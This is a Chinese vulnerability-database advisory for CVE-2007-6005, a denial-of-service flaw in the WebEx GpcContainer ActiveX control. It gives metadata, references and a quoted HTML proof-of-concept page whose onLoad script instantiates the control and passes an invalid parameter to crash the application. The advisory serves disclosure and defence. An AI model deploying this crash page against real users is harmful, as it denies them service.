WebEx GpcContainer.GpcContainer.1 ActiveX控件未明漏洞

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1113935 漏洞类型 资源管理错误
发布时间 2007-11-13 更新时间 2007-11-20
CVE编号 CVE-2007-6005 CNNVD-ID CNNVD-200711-234
漏洞平台 Windows CVSS评分 4.3
|漏洞来源
https://www.exploit-db.com/exploits/30761
https://www.securityfocus.com/bid/26430
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200711-234
|漏洞详情
WebEx中的GpcContainer.GpcContainer.1ActiveX控件存在未明漏洞,远程攻击者借助(1)InitParam方法的一个无效参数或(2)包含SetParam方法的一个未明向量造成拒绝服务。
|漏洞EXP
source: http://www.securityfocus.com/bid/26430/info

WebEx is prone to multiple remote denial-of-service vulnerabilities.

Attackers can exploit these issues to crash applications that use the ActiveX control, denying service to legitimate users.

<html>
 <head>
  <script language="JavaScript" DEFER>
    function Check() {
        var obj = new ActiveXObject("GpcContainer.GpcContainer.1");

        obj.InitParam("A");
}
  </script>

 </head>
 <body onLoad="JavaScript: return Check();">

 </body>

</html>
|受影响的产品
WebEx WebEx ActiveX Control 0
|参考资料

来源:XF
名称:webex-gpccontainer-dos(38445)
链接:http://xforce.iss.net/xforce/xfdb/38445
来源:BID
名称:26430
链接:http://www.securityfocus.com/bid/26430
来源:OSVDB
名称:45294
链接:http://osvdb.org/45294
来源:FULLDISC
名称:20071113WebExGPCContainerMemoryAccessViolation
链接:http://marc.info/?l=full-disclosure&m=119498701505838&w=2